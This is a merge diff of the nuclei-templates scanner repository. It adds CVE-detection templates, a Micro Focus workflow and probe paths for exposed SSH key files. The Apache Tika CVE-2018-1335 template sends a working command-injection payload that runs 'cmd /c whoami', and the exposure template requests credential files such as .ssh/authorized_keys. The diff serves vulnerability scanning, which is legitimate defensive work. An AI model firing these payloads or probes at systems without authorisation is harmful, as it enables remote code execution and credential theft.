Merge pull request #21 from projectdiscovery/master

Updation

README.md

@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates      | Counts                         | Templates       | Counts                          | Templates        | Counts                         |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves           | 207            | vulnerabilities | 102 | exposed-panels   | 74   |
+| cves           | 210            | vulnerabilities | 102 | exposed-panels   | 80   |
 | exposures      | 55      | technologies    | 48      | misconfiguration | 49 |
-| workflows      | 22        | miscellaneous   | 16     | default-logins   | 14 |
+| workflows      | 23        | miscellaneous   | 16     | default-logins   | 14 |
 | exposed-tokens | 9 | dns             | 6               | fuzzing          | 4          |
 | helpers        | 2        | takeovers       | 1         | -                | -                              |
 
-**65 directories, 618 files**.
+**65 directories, 628 files**.
 
 </td>
 </tr>

cves/2018/CVE-2018-1335.yaml

@@ -0,0 +1,40 @@
+id: CVE-2018-1335
+
+info:
+  name: Apache Tika 1.15-1.17 Header Command Injection
+  author: pikpikcu
+  severity: critical
+  reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
+  edb: https://www.exploit-db.com/exploits/47208
+  tags: cve,cve2018,apache,tika,rce
+
+requests:
+  - method: PUT
+    path:
+      - "{{BaseURL}}/meta"
+    headers:
+      X-Tika-OCRTesseractPath: cscript
+      X-Tika-OCRLanguage: //E:Jscript
+      Expect: 100-continue
+      Content-type: image/jp2
+      Connection: close
+    body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: text/csv"
+        part: header
+
+      - type: word
+        words:
+          - "org.apache.tika.parser.DefaultParser"
+          - "org.apache.tika.parser.gdal.GDALParse"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-11853.yaml

@@ -0,0 +1,32 @@
+id: CVE-2020-11853
+
+info:
+  name: Micro Focus Operation Bridge Manager RCE
+  author: dwisiswant0
+  severity: high
+  reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html
+  description: |
+    This template supports the detection part only.
+
+    UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
+    but this template can probably also be used to detect Operations Bridge Manager
+    (containeirized) and Application Performance Management.
+
+    Originated from Metasploit module (#14654).
+  tags: cve,cve2020,opm,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ucmdb-api/connect"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "HttpUcmdbServiceProviderFactoryImpl"
+          - "ServerVersion=11.6.0"
+        part: body
+        condition: and

cves/2020/CVE-2020-11854.yaml

@@ -0,0 +1,32 @@
+id: CVE-2020-11854
+
+info:
+  name: Micro Focus UCMDB RCE
+  author: dwisiswant0
+  severity: critical
+  reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
+  description: |
+    This template supports the detection part only.
+
+    UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
+    but this template can probably also be used to detect Operations Bridge Manager
+    (containeirized) and Application Performance Management.
+
+    Originated from Metasploit module (#14654).
+  tags: cve,cve2020,ucmdb,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ucmdb-api/connect"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "HttpUcmdbServiceProviderFactoryImpl"
+          - "ServerVersion=11.6.0"
+        part: body
+        condition: and

exposures/files/server-private-keys.yaml

@@ -18,6 +18,10 @@ requests:
       - "{{BaseURL}}/id_dsa"
       - "{{BaseURL}}/.ssh/id_rsa"
       - "{{BaseURL}}/.ssh/id_dsa"
+      - "{{BaseURL}}/.ssh/known_hosts.old"
+      - "{{BaseURL}}/.ssh/authorized_keys"
+      - "{{BaseURL}}/_/.ssh/authorized_keys"
+      - "{{BaseURL}}/.ssh/known_hosts"
       - "{{BaseURL}}/{{Hostname}}.key"
       - "{{BaseURL}}/{{Hostname}}.pem"
 
@@ -31,6 +35,7 @@ requests:
           - "BEGIN DSA PRIVATE KEY"
           - "BEGIN EC PRIVATE KEY"
           - "BEGIN PGP PRIVATE KEY BLOCK"
+          - "ssh-rsa"
         condition: or
 
       - type: status

workflows/micro-focus-workflow.yaml

@@ -0,0 +1,11 @@
+id: micro-focus-workflow
+
+info:
+  name: Micro Focus Checks
+  author: dwisiswant0
+  description: A simple workflow that runs all Micro Focus related nuclei templates on a given target.
+
+workflows:
+  - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
+  - template: cves/2020/CVE-2020-11853.yaml
+  - template: cves/2020/CVE-2020-11854.yaml